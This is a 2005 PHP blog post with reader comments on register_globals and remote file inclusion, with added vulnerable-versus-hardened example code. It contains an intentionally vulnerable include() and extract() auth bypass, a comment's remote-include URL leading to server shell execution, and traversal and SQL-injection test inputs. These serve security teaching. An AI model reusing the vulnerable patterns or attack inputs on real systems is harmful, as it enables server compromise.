Good PHP practice
Wednesday 9 February 2005 at 01:36

Today I spent my precious time explaining to someone why “register_globals” and “short_open_tag” are evil. Well, they are not the default configuration (register_globals has been off by default since PHP 4.2.0), so you cannot rely on them, and register_globals in particular hands control of your variables to whoever writes the URL. Don’t use them! Turn them off!
register_globals
When “register_globals” is turned on and you click on
http://www.mysite.com/page.php?id=10
you could do this on page.php
<?php
echo 'The id is ' . $id;
?>
and it would output “10”.
NEVER USE THIS! IT IS BAD CODE!
What you should use instead is this
<?php
echo 'The id is ' . $_GET['id'];
?>
and turn “register_globals” off. Why? When you migrate your script to a decent server with the right options and you don’t use the right code, it simply Won’t Work™. Worse, with register_globals on, any request parameter can pre-set a variable your script never initialised, so a check like if ($logged_in) is decided by the visitor, not by your code. Reading $_GET['id'] explicitly says where the value comes from, and you should still validate it (an id is a number, not whatever string the URL carries).
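The register_globals problem as an added example that is not part of the original post. register_globals itself was removed in PHP 5.4, so the first function recreates its effect with extract(), which is the same mistake written by hand; the second reads only from the explicit request array, initialises every variable before use and validates the id. The password and the query arrays are constructed for the example; it assumes PHP 7 or later.

```php
<?php
// Added example, not code from the original post. Assumes PHP 7+ CLI.
// register_globals was removed in PHP 5.4; extract() below recreates its
// effect (every request parameter becomes a local variable).
declare(strict_types=1);

// Vulnerable pattern: $authorized is only ever *set* on one path and is
// assumed to be unset otherwise. With register_globals on (or extract()),
// ?authorized=1 in the query string pre-sets it. Note that extract() could
// also overwrite $adminPassword itself via ?adminPassword=x.
function render_page_vulnerable(array $query, string $adminPassword): string
{
    extract($query);                        // <- register_globals, reimplemented
    if (isset($password) && $password === $adminPassword) {
        $authorized = true;
    }
    if (!empty($authorized)) {              // attacker-controlled if never assigned above
        return 'admin panel';
    }
    return 'login form';
}

// Hardened pattern: read input only from the request array you were handed,
// initialise every variable before use, and compare in constant time.
function render_page_hardened(array $get, string $adminPassword): string
{
    $authorized = false;                    // always initialised
    $password = $get['password'] ?? null;   // explicit source, explicit default
    if (is_string($password) && hash_equals($adminPassword, $password)) {
        $authorized = true;
    }
    return $authorized ? 'admin panel' : 'login form';
}

// The id from the post: accept only a plain decimal number, nothing else.
function page_id(array $get): ?int
{
    $id = $get['id'] ?? '';
    return is_string($id) && ctype_digit($id) ? (int) $id : null;
}

// Constructed inputs standing in for $_GET (no password supplied at all).
$attack = ['authorized' => '1'];
echo render_page_vulnerable($attack, 's3cret'), "\n";   // admin panel
echo render_page_hardened($attack, 's3cret'), "\n";     // login form
var_dump(page_id(['id' => '10']));                      // int(10)
var_dump(page_id(['id' => '10 OR 1=1']));               // NULL
```

Run it with the php CLI: the vulnerable function returns the admin panel for ?authorized=1 without ever seeing a password, the hardened one does not, and page_id() rejects anything that is not a plain decimal id.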
Posted in: Dev
11 Comments
1.
wapi | Friday 11 February 2005 at 19:58 |
Even simpler: use PHP version <= 4.2.0 and you HAVE to use $HTTP_GET_VARS everywhere; the ‘$var’ statement won’t even work.
Of course not a solution…
2.
wapi | Friday 11 February 2005 at 19:59 |
Dunno why my comment broke off, but I wanted to say: “use a version lower than 4.2.0 and you just HAVE to use $HTTP_GET_VARS. ‘$var’ simply won’t work at all. Not a decent solution of course.”
3.
jesus_ | Sunday 13 February 2005 at 00:49 |
Indeed, it’s evil. You should use what the manual tells you to use. And that is NEVER $var.
On the other hand, I doubt using old PHP versions is the solution. PHP5 is a pleasure to code in; you won’t see me going back to 4.2.
4.
wap | Friday 18 February 2005 at 12:43 |
In PHP5 you can’t exclude includes (…) from including external pages.
Example: index.php?foo=bar
index.php: include($foo);
Call: index.php?foo=http://www.foo.com/bar.c
With some more commands, shell execution is possible on the server.
Or am I wrong here?
PHP versions prior to 5 could block this option.
And file_exists can handle remote files in PHP5, where PHP4 couldn’t do this (so the hack won’t work in PHP4 when using file_exists).
Anyway, PHP rules.
5.
jesus_ | Friday 18 February 2005 at 17:50 |
There are many ways to prevent this. First of all, you should use a switch case to make sure nothing you don’t want to happen happens. Example:
switch ($_GET['foo']) {
    case 'a.php': include('a.php'); break;
    case 'b.php': include('b.php'); break;
    default: die("Don't try to hack the script!");
}
Also, including external files is only possible when (and I quote)
So turn off allow_url_fopen and you’re safe too. Those are two ways I can come up with off the top of my head; there are more.
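The switch from the comment above, generalised into an allowlist, as an added example that is not code from the original post or its comments. The ./pages/ directory and its page names are constructed for the example, and it assumes PHP 7 or later. It goes beyond the comment in two ways: it also checks that the resolved path stays inside the pages directory (which stops ../ traversal, not just URLs), and it reads allow_url_include, the setting that since PHP 5.2 governs include() of URLs separately from allow_url_fopen.

```php
<?php
// Added example, not code from the original post or comments.
// Assumes PHP 7+ CLI and a hypothetical ./pages/ directory.
declare(strict_types=1);

// Vulnerable: the request decides what gets included. With allow_url_include
// on this reaches http://..., and even with it off, ../ walks the filesystem.
function include_vulnerable(array $get): void
{
    include($get['foo']);
}

// Fix 1 (the switch from the comment, generalised): a fixed map from a
// request token to a file path. Anything not in the map is rejected, and the
// request never contributes characters to the path at all.
const PAGES = [
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
];

function resolve_page(string $token): ?string
{
    return PAGES[$token] ?? null;   // array lookup, not string building
}

// Fix 2 (defence in depth): even for a path built from the token, make sure
// the resolved real path lives under the pages directory.
function under_directory(string $candidate, string $baseDir): bool
{
    $real = realpath($candidate);
    $base = realpath($baseDir);
    return $real !== false && $base !== false
        && strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) === 0;
}

function include_hardened(array $get): void
{
    $path = resolve_page((string) ($get['foo'] ?? ''));
    if ($path === null || !under_directory($path, __DIR__ . '/pages')) {
        http_response_code(404);
        exit('no such page');
    }
    include $path;
}

// Fix 3: the ini side. allow_url_fopen (mentioned in the comment) covers
// fopen() & co.; since PHP 5.2 allow_url_include (default off) is what
// actually decides whether include() may fetch a URL.
function remote_include_possible(): bool
{
    return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

var_dump(resolve_page('about'));                     // string "pages/about.php"
var_dump(resolve_page('http://www.foo.com/bar.c'));  // NULL
var_dump(resolve_page('../../etc/passwd'));          // NULL
var_dump(remote_include_possible());                 // bool(false) on a default config
```

For a big module-based application the map can be built from a directory listing at deploy time; the point is that the request selects a key, never a path.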
6.
wapi | Friday 18 February 2005 at 19:49 |
Nice
Thanks for the clarification.
The 1st option is a bit of a big workaround; consider big module-based apps like phpnuke…
The 2nd option I like better, but sometimes it comes in really handy to include an external page. An iframe sucks. But then again, it’s better to be safe than to be easy (or how else can I say this? :p)
7.
jesus_ | Saturday 19 February 2005 at 13:25 |
At your service
I’ll get a php syntax highlighter soon for comments and posts like this.
8.
wap | Tuesday 1 March 2005 at 09:08 |
Posted with Firefox 1.0.1 on Windows XP
Here’s a nice one if you’d care.
9.
jesus_ | Tuesday 1 March 2005 at 10:05 |
Posted with Firefox 1.0 on Ubuntu Linux
Thanks, I’ll have a look.
10.
kamil | Saturday 26 March 2005 at 19:09 |
Posted with Internet Explorer 5.0 on Windows 98
Hi Niki
11.
jesus_ | Saturday 26 March 2005 at 19:17 |
Posted with Firefox 1.0 on Ubuntu Linux
*looks around*
Niki?